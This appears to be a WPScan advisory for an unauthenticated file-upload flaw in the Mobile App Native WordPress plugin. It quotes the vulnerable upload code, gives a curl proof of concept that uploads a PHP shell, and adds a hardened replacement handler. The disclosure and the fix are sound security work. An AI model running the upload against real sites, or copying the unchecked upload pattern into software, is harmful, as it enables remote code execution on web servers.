Mobile App Native <= 3.0 - Remote File Upload


Description
The file ./zen-mobile-app-native/server/images.php handles uploads without requiring authentication and without checking that the requesting user is allowed to upload content.
It also performs no validation of the uploaded file's extension or contents, so a file containing executable code (such as PHP) is written to the web-accessible images/ directory under a server-chosen name, and the URL of the stored file is echoed back to the client.

<?php
//header('content-type: text/html; charset=iso-8859-2');
header('Content-Type: text/html; charset=utf-8');
header('Access-Control-Allow-Origin: *');
require_once('function.php');

// No authentication or capability check precedes the upload handling.
if ($_FILES['file']['name']) {
    if (!$_FILES['file']['error']) {
        // Server-chosen base name; the extension is copied verbatim from the
        // client-supplied file name and is never validated.
        $name = md5(rand(100, 200));
        $ext = explode('.', $_FILES['file']['name']);
        $filename = $name . '.' . $ext[1];
        $destination = 'images/' . $filename;
        $location = $_FILES["file"]["tmp_name"];
        move_uploaded_file($location, $destination);
        // The URL of the stored file is returned to the uploader.
        echo $plugin_url . '/server/images/' . $filename;
    }
    else {
        echo $message = 'Ooops!  Your upload triggered the following error:  ' . $_FILES['file']['error'];
    }
}

Proof of Concept
$ curl -F "file=@/var/www/shell.php" "http://example.com/wp-content/plugins/zen-mobile-app-native/server/images.php"
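A hardened version of the handler, added here as an example and not taken from the plugin or the advisory, shows the checks the original omits. It assumes WordPress is bootstrapped before this script runs (for instance by routing the request through admin-ajax.php or including wp-load.php) so the capability, nonce and file-type APIs are available; the nonce action name zen_image_upload is an assumption.

```php
<?php
// Hardened upload handler (added example). Assumes WordPress is loaded so that
// is_user_logged_in(), current_user_can(), wp_verify_nonce(),
// wp_check_filetype_and_ext(), plugins_url() and esc_url() exist.
header('Content-Type: text/plain; charset=utf-8');

// 1. Authentication and authorization: only users who may upload media.
if (!is_user_logged_in() || !current_user_can('upload_files')) {
    http_response_code(403);
    exit('Forbidden');
}

// 2. CSRF protection; 'zen_image_upload' is an assumed nonce action name.
if (!isset($_POST['_wpnonce']) || !wp_verify_nonce($_POST['_wpnonce'], 'zen_image_upload')) {
    http_response_code(403);
    exit('Invalid request token');
}

if (!isset($_FILES['file']) || $_FILES['file']['error'] !== UPLOAD_ERR_OK) {
    http_response_code(400);
    exit('No file received or upload error');
}
$file = $_FILES['file'];

// 3. Allowlist of image types, checked by extension AND by file content.
$allowed = array('jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                 'png' => 'image/png',  'gif' => 'image/gif');
$check = wp_check_filetype_and_ext($file['tmp_name'], $file['name'], $allowed);
if (empty($check['ext']) || empty($check['type']) || !isset($allowed[$check['ext']])) {
    http_response_code(415);
    exit('Only JPEG, PNG or GIF images are accepted');
}
if (@getimagesize($file['tmp_name']) === false) {
    http_response_code(415);
    exit('File is not a valid image');
}

// 4. Unpredictable server-chosen name; the client-supplied name never
//    reaches the filesystem path, so no path or extension tricks apply.
$filename    = bin2hex(random_bytes(16)) . '.' . $check['ext'];
$destination = __DIR__ . '/images/' . $filename;
if (!is_uploaded_file($file['tmp_name']) || !move_uploaded_file($file['tmp_name'], $destination)) {
    http_response_code(500);
    exit('Could not store file');
}

// Build the public URL relative to this script's location inside the plugin.
echo esc_url(plugins_url('images/' . $filename, __FILE__));
```

Independently of these checks, the images/ directory should be served with script execution disabled so that a stored file can never be interpreted as PHP even if a future validation bug lets one through.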

Affects Plugin

References

CVE 2017-6104
EXPLOITDB 41540
URL http://www.vapidlabs.com/advisory.php?v=178

Classification

Type UPLOAD
CWE CWE-434

Miscellaneous

Submitter Larry W. Cashdollar
Submitter Website http://www.vapidlabs.com/
Submitter Twitter @_larry0
Views 368
Verified No
WPVDB ID 8743

Timeline

Publicly Published 2017-02-28
Added 2017-03-01
Last Updated 2017-03-09

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.